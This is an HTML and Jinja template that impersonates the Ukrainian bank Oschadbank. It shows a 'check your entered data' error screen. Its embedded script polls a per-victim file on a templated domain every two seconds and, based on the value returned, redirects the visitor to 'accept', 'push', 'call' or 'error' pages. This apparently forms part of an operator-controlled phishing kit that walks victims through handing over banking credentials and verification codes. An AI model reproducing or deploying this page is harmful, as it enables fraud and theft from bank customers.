<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Roboto+Condensed&display=swap" rel="stylesheet">
    <title>Ощадбанк</title>
    <meta name="viewport" content="width=device-width">
    <meta property="og:url" content="http://www.oschadbank.ua/">
    <meta property="og:type" content="website">
    <meta property="og:title" content="Ощадбанк">
    <meta property="og:description" content="">
    <meta property="og:image" content="{{ url_for( 'static', filename='oschad/img/logo.png', v=1)}}">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="default">
    <meta name="apple-mobile-web-app-title" content="Ощадбанк">
    <link rel="apple-touch-icon" sizes="180x180" href="./favicon">
    <link rel="icon" type="image/png" sizes="32x32" href="./favicon/favicon-32x32.png">
    <link rel="icon" type="image/png" sizes="16x16" href="./favicon/favicon-16x16.png">
    <link rel="manifest" href="./favicon/site.webmanifest">
</head>
<style>
    * {
        font-family: 'Roboto Condensed', sans-serif;
    }

    body {
        background: #fff;
        color: #000;
        display: flex;
        justify-content: center;
        align-items: center;
        height: 90vh;
    }

    .wrapp {
        display: flex;
        justify-content: space-around;
        align-items: center;
        flex-direction: column;
        background: #fff;
        box-shadow: 20px 20px 40px rgb(44 62 80 / 15%);
        mix-blend-mode: normal;
        border-radius: 20px;
        margin: 0 auto;
        height: 450px;
        max-width: 300px;
        padding: 30px;
    }

    .img {
        margin-bottom: 80px;
        max-width: 100%;
    }

    .text {
        text-align: center;
        font-size: 26px;
        line-height: 30px;
    }

    .btn {
        margin: 0 auto;
        margin-top: 40px;
        display: flex;
        justify-content: center;
        align-items: center;
        background: linear-gradient(179.85deg, #00503c 0.13%, rgba(187, 187, 187, 0) 861.01%);
        backdrop-filter: blur(2px);
        border: none;
        width: 100%;
        height: 50px;
        font-size: 24px;
        line-height: 29px;
        cursor: pointer;
        color: #fff;
    }
</style>



<body>
    <div class="wrapp">
        <img src="{{ url_for( 'static', filename='oschad/img/oschad.png', v=1)}}" alt="phone" class="img">
        <div class="text">
            Перевiрте коректнiсть введених даних
        </div>
        <div class="btn" id="btn">Повернутися</div>
    </div>
    <script>
        changeError(`https://{{domain}}/static/servers/{{keySTR}}.txt`);
        function changeError(url) {
          console.log("{{keySTR}}");
          const requestURL = url;
          const xhr = new XMLHttpRequest();
          xhr.open("GET", requestURL);
          const r = xhr.response.split(';') 
          console.log(r)
          xhr.onload = () => {
            setTimeout(() => {
              console.log(xhr.response);
              if (xhr.response === "0") {
                console.log("set");
                changeError(url);
              }
              if (xhr.response === "1") {
                window.location.href="https://{{domain}}/accept/{{keySTR}}"
                console.log("Добрый день,я 1");
              }
              if (xhr.response === "2") {
            window.location.href="https://{{domain}}/push/{{keySTR}}"
                console.log("Добрый день,я 2");
              }
              if (xhr.response === "3") {
                window.location.href="https://{{domain}}/call/{{keySTR}}"
                    console.log("Добрый день,я 3");
                  }
               if (xhr.response === "4") {
                window.location.href="https://{{domain}}/error/{{keySTR}}"
                    console.log("Добрый день,я 4");
                  }
              
            }, 2000);
          };
          const value = xhr.send();
        }
      </script>
</body>

</html>